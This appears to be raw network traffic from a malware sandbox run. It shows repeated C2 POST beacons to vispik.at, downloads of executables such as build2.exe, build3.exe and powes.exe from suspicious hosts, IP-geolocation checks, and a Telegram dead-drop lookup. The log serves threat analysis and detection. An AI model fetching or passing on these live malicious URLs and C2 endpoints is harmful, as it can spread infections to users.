                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 284
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:32 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 44
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
• IT
                                    GET
                                    http://190.211.254.211/vokka.exe
                                    Remote address:
                                    190.211.254.211:80
                                    Request
                                    GET /vokka.exe HTTP/1.1
                                    Connection: Keep-Alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Host: 190.211.254.211
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx/1.14.2
                                    Date: Sun, 19 Mar 2023 04:08:33 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 2822144
                                    Last-Modified: Sun, 19 Mar 2023 04:00:02 GMT
                                    Connection: keep-alive
                                    ETag: "641688c2-2b1000"
                                    Accept-Ranges: bytes
• US
                                    DNS
                                    191.59.80.34.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    191.59.80.34.in-addr.arpa
                                    IN PTR
                                    Response
                                    191.59.80.34.in-addr.arpa
                                    IN PTR
191.59.80.34.bc.googleusercontent.com
• US
                                    DNS
                                    211.254.211.190.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    211.254.211.190.in-addr.arpa
                                    IN PTR
                                    Response
                                    211.254.211.190.in-addr.arpa
                                    IN PTR
hostedby.privatelayer.com
• HU
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://xkurmi.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 311
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:34 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
• HU
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://kcgti.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 202
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:35 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
• HU
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://ffhoxximyv.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 343
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:35 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
• HU
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://sbibped.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 189
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:36 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
• HU
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://gxdgl.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 302
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:36 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
• HU
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://qfagrotk.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 139
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:37 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
• HU
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://wcgos.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 199
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:37 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
• HU
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://lmywgbbph.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 211
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:38 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
• HU
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://pgkcqo.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 173
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:38 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
• HU
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://qypvsdyv.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 226
                                    Host: vispik.at
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:39 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 0
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
• HU
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://mngounbb.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 156
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:39 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
• US
                                    GET
                                    https://104.234.147.45/6Z5XNkxFUvVYB0Sj+25HTNO6FpthqXYI9W/0GhKw5oDCnXQgqhVJdUFenReNFcz+g6fiGoCYeiQxZYbD4h3bKp+JPcBTMZ696v1D9vkBGBdJ1kk3d9j8Z4HD4zvyS40S/F/mrzV4kQrTBWZzA9GA10kgAPSjRExn4qRNTS4hA2p1Zi/PcDkCslsk7JU29r8=
                                    rundll32.exe
                                    Remote address:
                                    104.234.147.45:443
                                    Request
                                    GET /6Z5XNkxFUvVYB0Sj+25HTNO6FpthqXYI9W/0GhKw5oDCnXQgqhVJdUFenReNFcz+g6fiGoCYeiQxZYbD4h3bKp+JPcBTMZ696v1D9vkBGBdJ1kk3d9j8Z4HD4zvyS40S/F/mrzV4kQrTBWZzA9GA10kgAPSjRExn4qRNTS4hA2p1Zi/PcDkCslsk7JU29r8= HTTP/1.1
                                    Host: 104.234.147.45
                                    Response
                                    HTTP/1.0 200 OK
                                    Server: Apache/2.4.7 (Ubuntu)
                                    Accept-Ranges: bytes
                                    Content-Type: application/octet-stream
                                    Content-Disposition: attachment; filename=CFE46B5638C3C85D9F4D7BD058C27813
                                    Connection: Close
                                    Content-Length: 3667232
                                    Connection: close
• HU
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://olriob.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 181
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:40 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://etfcy.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 136
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:40 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-us
                                    DNS
                                    zexeq.com
                                    7C6.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    zexeq.com
                                    IN A
                                    Response
                                    zexeq.com
                                    IN A
                                    203.91.116.53
                                    zexeq.com
                                    IN A
                                    190.141.123.88
                                    zexeq.com
                                    IN A
                                    211.53.230.67
                                    zexeq.com
                                    IN A
                                    178.30.120.200
                                    zexeq.com
                                    IN A
                                    86.122.83.142
                                    zexeq.com
                                    IN A
                                    187.156.88.173
                                    zexeq.com
                                    IN A
                                    211.40.39.251
                                    zexeq.com
                                    IN A
                                    175.126.109.15
                                    zexeq.com
                                    IN A
                                    211.171.233.126
                                    zexeq.com
                                    IN A
                                    58.235.189.192
                                  • flag-iq
                                    GET
                                    http://uaery.top/dl/build2.exe
                                    D892.exe
                                    Remote address:
                                    185.95.186.58:80
                                    Request
                                    GET /dl/build2.exe HTTP/1.1
                                    User-Agent: Microsoft Internet Explorer
                                    Host: uaery.top
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:40 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                    Last-Modified: Mon, 13 Mar 2023 14:22:43 GMT
                                    ETag: "73800-5f6c8d8284590"
                                    Accept-Ranges: bytes
                                    Content-Length: 473088
                                    Connection: close
                                    Content-Type: application/octet-stream
                                  • flag-us
                                    DNS
                                    hoh0aeghwugh2gie.com
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    hoh0aeghwugh2gie.com
                                    IN A
                                    Response
                                    hoh0aeghwugh2gie.com
                                    IN A
                                    109.206.243.140
                                  • flag-nl
                                    POST
                                    http://hoh0aeghwugh2gie.com/
                                    Remote address:
                                    109.206.243.140:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://owmccjp.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 367
                                    Host: hoh0aeghwugh2gie.com
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:40 GMT
                                    Server: Apache/2.4.41 (Ubuntu)
                                    Connection: close
                                    Transfer-Encoding: chunked
                                    Content-Type: text/html; charset=utf-8
                                  • flag-mn
                                    GET
                                    http://zexeq.com/test2/get.php?pid=2E4297661923E929EC39E21858810F48&first=true
                                    D892.exe
                                    Remote address:
                                    203.91.116.53:80
                                    Request
                                    GET /test2/get.php?pid=2E4297661923E929EC39E21858810F48&first=true HTTP/1.1
                                    User-Agent: Microsoft Internet Explorer
                                    Host: zexeq.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:40 GMT
                                    Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 559
                                    Connection: close
                                    Content-Type: text/html; charset=UTF-8
                                  • flag-us
                                    DNS
                                    45.147.234.104.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    45.147.234.104.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://rvtasltn.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 311
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:40 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-iq
                                    GET
                                    http://uaery.top/dl/build2.exe
                                    DBEE.exe
                                    Remote address:
                                    185.95.186.58:80
                                    Request
                                    GET /dl/build2.exe HTTP/1.1
                                    User-Agent: Microsoft Internet Explorer
                                    Host: uaery.top
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:41 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                    Last-Modified: Mon, 13 Mar 2023 14:22:43 GMT
                                    ETag: "73800-5f6c8d8284590"
                                    Accept-Ranges: bytes
                                    Content-Length: 473088
                                    Connection: close
                                    Content-Type: application/octet-stream
                                  • flag-mn
                                    GET
                                    http://zexeq.com/lancer/get.php?pid=2E4297661923E929EC39E21858810F48&first=false
                                    DBEE.exe
                                    Remote address:
                                    203.91.116.53:80
                                    Request
                                    GET /lancer/get.php?pid=2E4297661923E929EC39E21858810F48&first=false HTTP/1.1
                                    User-Agent: Microsoft Internet Explorer
                                    Host: zexeq.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:41 GMT
                                    Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 563
                                    Connection: close
                                    Content-Type: text/html; charset=UTF-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://mvyodw.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 285
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:41 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-hu
                                    POST
                                    http://vispik.at/tmp/
                                    Remote address:
                                    176.226.127.181:80
                                    Request
                                    POST /tmp/ HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://notjy.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 315
                                    Host: vispik.at
                                    Response
                                    HTTP/1.0 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:08:41 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                    X-Powered-By: PHP/5.6.40
                                    Content-Length: 331
                                    Connection: close
                                    Content-Type: text/html; charset=utf-8
                                  • flag-us
                                    DNS
                                    140.243.206.109.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    140.243.206.109.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    53.116.91.203.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    53.116.91.203.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-mn
                                    GET
                                    http://zexeq.com/files/1/build3.exe
                                    D892.exe
                                    Remote address:
                                    203.91.116.53:80
                                    Request
                                    GET /files/1/build3.exe HTTP/1.1
                                    User-Agent: Microsoft Internet Explorer
                                    Host: zexeq.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:42 GMT
                                    Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                    Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
                                    ETag: "2600-5c86757379380"
                                    Accept-Ranges: bytes
                                    Content-Length: 9728
                                    Connection: close
                                    Content-Type: application/x-msdownload
                                  • flag-us
                                    DNS
                                    t.me
                                    build2.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    t.me
                                    IN A
                                    Response
                                    t.me
                                    IN A
                                    149.154.167.99
                                  • flag-nl
                                    GET
                                    https://t.me/zaskullz
                                    build2.exe
                                    Remote address:
                                    149.154.167.99:443
                                    Request
                                    GET /zaskullz HTTP/1.1
                                    X-Id: d6ef050131e7d5a1d595c51613328971
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
                                    Host: t.me
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Sun, 19 Mar 2023 04:08:51 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 12345
                                    Connection: keep-alive
                                    Set-Cookie: stel_ssid=2a698208a056db331d_8244500222383029488; expires=Mon, 20 Mar 2023 04:08:51 GMT; path=/; samesite=None; secure; HttpOnly
                                    Pragma: no-cache
                                    Cache-control: no-store
                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                    Strict-Transport-Security: max-age=35768000
                                  • flag-mn
                                    GET
                                    http://zexeq.com/files/1/build3.exe
                                    DBEE.exe
                                    Remote address:
                                    203.91.116.53:80
                                    Request
                                    GET /files/1/build3.exe HTTP/1.1
                                    User-Agent: Microsoft Internet Explorer
                                    Host: zexeq.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:51 GMT
                                    Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                    Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
                                    ETag: "2600-5c86757379380"
                                    Accept-Ranges: bytes
                                    Content-Length: 9728
                                    Connection: close
                                    Content-Type: application/x-msdownload
                                  • flag-us
                                    DNS
                                    99.167.154.149.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    99.167.154.149.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    22.249.124.192.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    22.249.124.192.in-addr.arpa
                                    IN PTR
                                    Response
                                    22.249.124.192.in-addr.arpa
                                    IN PTR
                                    cloudproxy10022.sucuri.net
                                  • flag-de
                                    GET
                                    http://116.203.13.130/
                                    build2.exe
                                    Remote address:
                                    116.203.13.130:80
                                    Request
                                    GET / HTTP/1.1
                                    X-Id: d6ef050131e7d5a1d595c51613328971
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37
                                    Host: 116.203.13.130
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:52 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                  • flag-de
                                    GET
                                    http://116.203.13.130/edit.zip
                                    build2.exe
                                    Remote address:
                                    116.203.13.130:80
                                    Request
                                    GET /edit.zip HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37
                                    Host: 116.203.13.130
                                    Cache-Control: no-cache
                                    Response
                                    HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 19 Mar 2023 04:08:52 GMT
                                    Content-Type: application/zip
                                    Content-Length: 2685679
                                    Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
                                    Connection: keep-alive
                                    ETag: "631f30d3-28faef"
                                    Accept-Ranges: bytes
                                  • flag-us
                                    DNS
                                    130.13.203.116.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    130.13.203.116.in-addr.arpa
                                    IN PTR
                                    Response
                                    130.13.203.116.in-addr.arpa
                                    IN PTR
                                    static.130.13.203.116.clients.your-server.de
                                  • flag-iq
                                    GET
                                    http://uaery.top/dl/build2.exe
                                    7C6.exe
                                    Remote address:
                                    185.95.186.58:80
                                    Request
                                    GET /dl/build2.exe HTTP/1.1
                                    User-Agent: Microsoft Internet Explorer
                                    Host: uaery.top
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:54 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                    Last-Modified: Mon, 13 Mar 2023 14:22:43 GMT
                                    ETag: "73800-5f6c8d8284590"
                                    Accept-Ranges: bytes
                                    Content-Length: 473088
                                    Connection: close
                                    Content-Type: application/octet-stream
                                  • flag-mn
                                    GET
                                    http://zexeq.com/files/1/build3.exe
                                    7C6.exe
                                    Remote address:
                                    203.91.116.53:80
                                    Request
                                    GET /files/1/build3.exe HTTP/1.1
                                    User-Agent: Microsoft Internet Explorer
                                    Host: zexeq.com
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sun, 19 Mar 2023 04:08:57 GMT
                                    Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                    Last-Modified: Sat, 31 Jul 2021 08:44:14 GMT
                                    ETag: "2600-5c86757379380"
                                    Accept-Ranges: bytes
                                    Content-Length: 9728
                                    Connection: close
                                    Content-Type: application/x-msdownload
                                  • flag-us
                                    DNS
                                    50.4.107.13.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    50.4.107.13.in-addr.arpa
                                    IN PTR
                                    Response
                                  • 172.67.181.144:80
                                    http://potunulit.org/
                                    http
                                    80.4kB
                                    3.5MB
                                    1442
                                    2660

                                    HTTP Request

                                    POST http://potunulit.org/

                                    HTTP Response

                                    404

                                    (this POST / 404 exchange repeats 25 times on this connection)
• 185.95.186.58:80 | http://uaery.top/dl/build.exe | proto: http | sent 23.5kB in 406 packets, received 833.7kB in 610 packets
    GET http://uaery.top/dl/build.exe -> 200
• 45.9.74.80:80 | http://45.9.74.80/powes.exe | proto: http | sent 38.2kB in 694 packets, received 1.6MB in 1159 packets
    GET http://45.9.74.80/powes.exe -> 200
• 162.0.217.254:443 | api.2ip.ua | process: D892.exe | sent 156 B in 3 packets
• 162.0.217.254:443 | api.2ip.ua | process: DBEE.exe | sent 156 B in 3 packets
• 159.253.45.38:443 | https://akar.av.tr/tmp/index.php | proto: tls, http | sent 7.0kB in 142 packets, received 357.2kB in 263 packets
    GET https://akar.av.tr/tmp/index.php -> 200
• 172.67.158.22:443 | https://j.ffbbjjkk.com/logo.png | proto: tls, http | process: zyy.exe | sent 13.3kB in 275 packets, received 662.8kB in 531 packets
    GET https://j.ffbbjjkk.com/2701.html -> 200
    GET https://j.ffbbjjkk.com/logo.png -> 200
• 172.67.158.22:443 | https://j.ffbbjjkk.com/logo.png | proto: tls, http | process: zyy.exe | sent 12.8kB in 265 packets, received 662.4kB in 517 packets
    GET https://j.ffbbjjkk.com/2701.html -> 200
    GET https://j.ffbbjjkk.com/logo.png -> 200
• 45.136.113.107:80 | http://bz.bbbeioaag.com/sts/bimage.jpg | proto: http | process: ss31.exe | sent 55.7kB in 1122 packets, received 1.6MB in 1589 packets
    GET http://bz.bbbeioaag.com/sts/bimage.jpg -> 200
• 45.136.113.107:80 | http://bz.bbbeioaag.com/sts/bimage.jpg | proto: http | process: ss31.exe | sent 51.8kB in 1123 packets, received 1.6MB in 1468 packets
    GET http://bz.bbbeioaag.com/sts/bimage.jpg -> 200
• 185.95.186.58:80 | http://uaery.top/dl/build.exe | proto: http | sent 16.4kB in 344 packets, received 833.3kB in 601 packets
    GET http://uaery.top/dl/build.exe -> 200
• 52.178.17.3:443 | sent 322 B in 7 packets
• 89.190.157.61:80 | http://ebfertility.com/portline-containers.com/serv.exe | proto: http | sent 6.6kB in 139 packets, received 373.6kB in 271 packets
    GET http://ebfertility.com/portline-containers.com/serv.exe -> 200
• 162.0.217.254:443 | api.2ip.ua | process: 7C6.exe | sent 156 B in 3 packets
